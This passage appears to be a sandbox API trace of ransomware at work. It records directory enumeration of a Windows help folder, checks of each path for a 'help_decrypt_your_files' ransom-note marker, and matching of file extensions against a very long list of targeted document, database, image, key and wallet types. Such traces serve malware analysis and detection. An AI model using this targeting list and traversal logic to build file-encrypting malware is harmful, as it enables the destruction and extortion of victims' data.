stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".hxn") returned 0x0
	[0177.859] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x58ff391c, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0x58ff391c, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x594409e2, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.LYNC_BASIC.16.1033.hxn", cAlternateFileName="MSLYNC~3.HXN")) returned 1
	[0177.860] lstrcmpW (lpString1="MS.LYNC_BASIC.16.1033.hxn", lpString2="..") returned 1
	[0177.860] lstrcmpW (lpString1="MS.LYNC_BASIC.16.1033.hxn", lpString2=".") returned 1
	[0177.860] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\All Users\\Microsoft Help\\" | out: lpString1="C:\\Users\\All Users\\Microsoft Help\\") returned="C:\\Users\\All Users\\Microsoft Help\\"
	[0177.860] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft Help\\", lpString2="MS.LYNC_BASIC.16.1033.hxn" | out: lpString1="C:\\Users\\All Users\\Microsoft Help\\MS.LYNC_BASIC.16.1033.hxn") returned="C:\\Users\\All Users\\Microsoft Help\\MS.LYNC_BASIC.16.1033.hxn"
	[0177.860] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft Help\\MS.LYNC_BASIC.16.1033.hxn") returned 59
	[0177.860] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.860] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\MS.LYNC_BASIC.16.1033.hxn", cchLength=0x3b | out: lpsz="c:\\users\\all users\\microsoft help\\ms.lync_basic.16.1033.hxn") returned 0x3b
	[0177.860] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.860] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\ms.lync_basic.16.1033.hxn", lpSrch="help_decrypt_your_files") returned 0x0
	[0177.861] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\all users\\microsoft help\\ms.lync_basic.16.1033.hxn" | out: lpString1="c:\\users\\all users\\microsoft help\\ms.lync_basic.16.1033.hxn") returned="c:\\users\\all users\\microsoft help\\ms.lync_basic.16.1033.hxn"
	[0177.861] lstrlenW (lpString="c:\\users\\all users\\microsoft help\\ms.lync_basic.16.1033.hxn") returned 59
	[0177.861] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.861] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.861] StrStrW (lpFirst=".hxn", lpSrch=".") returned=".hxn"
	[0177.861] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.862] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".hxn") returned 0x0
	[0177.862] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x58feea63, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0x58feea63, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x5943a85a, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.LYNC_ONLINE.16.1033.hxn", cAlternateFileName="MSLYNC~2.HXN")) returned 1
	[0177.862] lstrcmpW (lpString1="MS.LYNC_ONLINE.16.1033.hxn", lpString2="..") returned 1
	[0177.862] lstrcmpW (lpString1="MS.LYNC_ONLINE.16.1033.hxn", lpString2=".") returned 1
	[0177.862] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\All Users\\Microsoft Help\\" | out: lpString1="C:\\Users\\All Users\\Microsoft Help\\") returned="C:\\Users\\All Users\\Microsoft Help\\"
	[0177.862] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft Help\\", lpString2="MS.LYNC_ONLINE.16.1033.hxn" | out: lpString1="C:\\Users\\All Users\\Microsoft Help\\MS.LYNC_ONLINE.16.1033.hxn") returned="C:\\Users\\All Users\\Microsoft Help\\MS.LYNC_ONLINE.16.1033.hxn"
	[0177.862] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft Help\\MS.LYNC_ONLINE.16.1033.hxn") returned 60
	[0177.862] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.863] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\MS.LYNC_ONLINE.16.1033.hxn", cchLength=0x3c | out: lpsz="c:\\users\\all users\\microsoft help\\ms.lync_online.16.1033.hxn") returned 0x3c
	[0177.863] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.863] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\ms.lync_online.16.1033.hxn", lpSrch="help_decrypt_your_files") returned 0x0
	[0177.863] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\all users\\microsoft help\\ms.lync_online.16.1033.hxn" | out: lpString1="c:\\users\\all users\\microsoft help\\ms.lync_online.16.1033.hxn") returned="c:\\users\\all users\\microsoft help\\ms.lync_online.16.1033.hxn"
	[0177.863] lstrlenW (lpString="c:\\users\\all users\\microsoft help\\ms.lync_online.16.1033.hxn") returned 60
	[0177.863] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.863] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.864] StrStrW (lpFirst=".hxn", lpSrch=".") returned=".hxn"
	[0177.864] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.864] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.